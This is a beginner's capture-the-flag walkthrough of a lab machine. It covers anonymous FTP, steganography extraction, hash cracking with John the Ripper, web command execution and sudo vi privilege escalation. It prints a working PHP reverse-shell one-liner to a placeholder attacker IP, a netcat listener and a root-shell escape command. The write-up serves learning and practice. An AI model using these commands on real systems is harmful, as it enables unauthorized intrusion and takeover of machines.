Deployed the machine and ready to enumerate.
After an Nmap scan, i found these ports open:
The first thing i did was to access the website
I have to find credentials. Let's go back to what information we have about the system. SSH? No, we don't have any key or any credentials to be able to login. FTP? Well yes, it supports Anonymous login so we have something
ftp [ip address] → when prompted to enter username you just type anonymous
In the FTP i found an image. I download it, and then used exiftool to see if there was anything useful. It had nothing. Then i used steghide without a password to extract information.
Got an encrypted base64 text
Using a base64 decryption, it gave me a hash. I used JohnTheRipper to crack the hash.
john — wordlist= /usr/share/wordlists/rockyou.txt /root/Desktop/factoryhash.txt
From cracking the hash i found the password for the user Charlie. I logged in the website using the credentials.
It looks like i can execute commands through the website.
As a beginner I started trying to find a way to access files through the execute button in the website, but I failed, i didn’t thought of using reverse shell. But after a little searching I found this website.
I knew that the website used php, so I used a php reverse shell.
php -r ‘$sock=fsockopen(“<YOUR IP>”,<PORT>);popen(“/bin/sh -i <&3 >&3 2>&3”, “r”);’
I started listening to port 4444 using netcat
nc -lvnp 4444
I pasted the reverse shell in the “Command” section of the website. and pressed “Execute”. I got in but with limited privileges and mobility.
I searched in the directories. In /home/charlie directory I found these 3 files.
I tried to cat user.txt but I didn’t have enough privileges. Then I used cat to read the teleport file and it was an RSA file. Then I used that RSA file to connect through SSH. And it was successful.
I went to the /Charlie directory to read the user.txt file. And it was the user’s flag
Now to find the root flag I have to be root. I used sudo -l to see my privileges
We can use vi. I’ve searched for a way to use vi with root privileges and i found this command
sudo vi -c ‘:!/bin/sh’ /dev/null
And with that I had root privileges, i went to the root folder and found a python file “root.py”. I used python root.py and the file asked for the key.
I pasted it and…
Below this text it’s the flag. And we are Done!!